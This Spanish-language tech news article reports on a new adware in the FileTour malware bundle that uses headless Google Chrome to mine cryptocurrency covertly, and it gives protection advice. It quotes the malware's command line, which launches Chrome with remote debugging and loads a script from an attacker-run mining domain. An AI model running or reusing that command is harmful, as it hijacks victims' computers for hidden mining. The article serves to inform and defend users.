Cuidado con FileTour, este adware utiliza Google Chrome para minar criptomonedas incluso con el navegador cerrado

Escrito por Rubén Velasco

Aunque en lo que llevamos de año las criptomonedas han pasado un poco a segundo plano, aún siguen siendo una fuente de ingresos muy jugosa para los piratas informáticos. Por ello, cada poco tiempo seguimos viendo cómo estos crean diferentes clases de malware de este tipo, malware que, cuando infecta a los usuarios, recurre a diversas técnicas para conseguir minar criptomonedas en los ordenadores, tal como hace FileTour, un paquete de amenazas informáticas que ahora cuenta con un nuevo adware que acaba de ser detectado.

FileTour es un paquete de malware que se distribuye habitualmente como cracks o herramientas para hacer trampas en diversos juegos de ordenador. Dentro de este paquete se suele encontrar todo tipo de amenazas informáticas, como aplicaciones potencialmente no deseadas, adware, software para robar contraseñas, troyanos, etc.

Cómo funciona el nuevo Adware del paquete FileTour y cómo mina criptomonedas en nuestro PC

La última versión de este paquete de malware, recién detectada, cuenta con un nuevo adware en su interior que, cuando infecta el ordenador de las víctimas, se configura para lanzar automáticamente una instancia de Google Chrome de manera que este malware se conecte a una web remota, la cual cargará un script de minado en nuestro ordenador y comenzará con su labor, todo ello, además, sin levantar sospechas del usuario y sin la necesidad de tener la ventana del navegador abierta.

El comando que se encarga de ejecutar este malware es:

C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41.html?t=0.4

El malware abre una instancia de Google Chrome, con la GPU desactivada y, a través del puerto remoto de depuración 9222 se conecta a una web de minado controlada por los piratas informáticos. Esta web automáticamente hace que el proceso de Google Chrome consuma entre un 70 y un 80% de la CPU, y seguirá minando criptomonedas incluso cuando tengamos cerrada la ventana del navegador, ya que el proceso quedará siempre abierto.

Por defecto, la web utiliza los scripts de CoinCube para llevar a cabo esta tarea. Aunque todo esto se realiza en segundo plano sin que nosotros hagamos nada, si intentamos entrar en la web manualmente nos encontraremos con una página que simula ser Cloudflare con un captcha que nos pide verificar nuestra identidad. Si entramos manualmente la web no hace nada (ni redirige a ningún sitio), por lo que de alguna manera depende del malware

FileTour Adware Chrome

Cómo protegernos de este nuevo adware

Como hemos explicado, esta amenaza informática se divide principalmente en dos: por un lado tenemos el adware como tal, FileTour, que llega a nuestros ordenadores al descargar archivos de dudosa procedencia, del cual podemos protegernos, como siempre, utilizando un antivirus en nuestro equipo y, además, utilizando el sentido común al descargar archivos de Internet y evitar descargar software ilegal.

Por otro lado, este adware hace uso del script de minado CoinCube, similar a CoinHive, por lo que para protegernos de ellos también podemos recurrir al uso de extensiones que se encargan de bloquear las conexiones a distintos equipos de minado, o a Halt and Block Mining, una sencilla herramienta creada por nosotros que bloquea, en el fichero HOSTS de nuestro ordenador, los principales servidores de minado, haciendo que este tipo de malware sea totalmente inútil.

¿Qué opinas de este nuevo adware que mina criptomonedas en los ordenadores de las víctimas?

Fuente > bleepingcomputer